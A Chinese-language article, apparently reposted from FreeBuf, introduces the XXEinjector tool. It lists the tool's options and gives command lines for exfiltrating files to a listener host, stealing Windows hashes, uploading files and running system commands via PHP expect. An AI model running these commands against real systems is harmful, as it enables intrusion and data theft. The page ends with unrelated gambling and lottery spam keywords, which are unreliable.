XXEinjector:一款功能強大的自動化XXE注射工具

今天給大家介紹的是一款名叫XXEinjector的漏洞利用工具,XXEinjector是一款基于Ruby的XXE注入工具,它可以使用多種直接或間接帶外方法來檢索文件。

1.png

今天給大家介紹的是一款名叫XXEinjector的漏洞利用工具,XXEinjector是一款基于Ruby的XXE注入工具,它可以使用多種直接或間接帶外方法來檢索文件。其中,目錄枚舉功能只對Java應用程序有效,而暴力破解攻擊需要使用到其他應用程序。

XXEinjector注入工具的使用

XXEinjector本身提供了非常非常豐富的操作選項,所以大家在利用XXEinjector進行滲透測試之前,請自習了解這些配置選項,以最大限度地發揮XXEinjector的功能。當然了,由于XXEinjector是基于Ruby開發的,所以Ruby運行環境就是必須的了。

2.png

--host     必填項– 用于建立反向鏈接的IP地址。(--host=192.168.0.2)
--file      必填項- 包含有效HTTP請求的XML文件。(--file=/tmp/req.txt)
--path           必填項-是否需要枚舉目錄 – 枚舉路徑。(--path=/etc)
--brute          必填項-是否需要爆破文件 -爆破文件的路徑。(--brute=/tmp/brute.txt)
--logger        記錄輸出結果。
--rhost          遠程主機IP或域名地址。(--rhost=192.168.0.3)
--rport          遠程主機的TCP端口信息。(--rport=8080)
--phpfilter    在發送消息之前使用PHP過濾器對目標文件進行Base64編碼。
--netdoc     使用netdoc協議。(Java).
--enumports   枚舉用于反向鏈接的未過濾端口。(--enumports=21,22,80,443,445)
--hashes       竊取運行當前應用程序用戶的Windows哈希。
--expect        使用PHP expect擴展執行任意系統命令。(--expect=ls)
--upload       使用Java jar向臨時目錄上傳文件。(--upload=/tmp/upload.txt)
--xslt      XSLT注入測試。
--ssl              使用SSL。
--proxy         使用代理。(--proxy=127.0.0.1:8080)
--httpport Set自定義HTTP端口。(--httpport=80)
--ftpport       設置自定義FTP端口。(--ftpport=21)
--gopherport  設置自定義gopher端口。(--gopherport=70)
--jarport       設置自定義文件上傳端口。(--jarport=1337)
--xsltport  設置自定義用于XSLT注入測試的端口。(--xsltport=1337)
--test     該模式可用于測試請求的有效。
--urlencode     URL編碼,默認為URI。
--output       爆破攻擊結果輸出和日志信息。(--output=/tmp/out.txt)
--timeout     設置接收文件/目錄內容的Timeout。(--timeout=20)
--contimeout  設置與服務器斷開連接的,防止DoS出現。(--contimeout=20)
--fast     跳過枚舉詢問,有可能出現結果假陽性。
--verbose     顯示verbose信息。

如果你現在還對XXE攻擊不是很了解的話,推薦大家先閱讀下面這篇文章:《XXE注入攻擊-XML外部實體漏洞及樣本分析》。

XXEinjector使用樣例

枚舉HTTPS應用程序中的/etc目錄:

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt –ssl

使用gopher(OOB方法)枚舉/etc目錄:

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher

二次漏洞利用:

ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt--2ndfile=/tmp/2ndreq.txt

使用HTTP帶外方法和netdoc協議對文件進行爆破攻擊:

ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt--file=/tmp/req.txt --oob=http –netdoc

通過直接性漏洞利用方式進行資源枚舉:

ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK

枚舉未過濾的端口:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all

竊取Windows哈希:

ruby XXEinjector.rb--host=192.168.0.2 --file=/tmp/req.txt –hashes

使用Java jar上傳文件:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt--upload=/tmp/uploadfile.pdf

使用PHP expect執行系統指令:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter--expect=ls

測試XSLT注入:

ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt –xslt

記錄請求信息:

ruby XXEinjector.rb --logger --oob=http--output=/tmp/out.txt

XXEinjector下載地址:

XXEinjector-master.zip

* 參考來源:darknet,FB小編Alpha_h4ck編譯,轉載請注明來自FreeBuf.COM

1

更多精彩
發表評論

已有 1 條評論

取消
Loading...

填寫個人信息

姓名
電話
郵箱
公司
行業
職位
css.php 重庆百变王牌走势图 金猪配资 股票涨跌幅和收益 黑龙江11选5网上投注 快乐12任5开 墨西哥超级联赛积分 天天红包赛步数多了 吉祥吉林麻将官网 股票推荐买入术语 贵州十一选五基本走势图表 河北福彩排七开奖结果 私募基金配资 黑龙江快乐十分走势图开奖 排列三和尾走势图 长沙麻将好友房 英冠联赛积分榜 上海11选5前1最大遗漏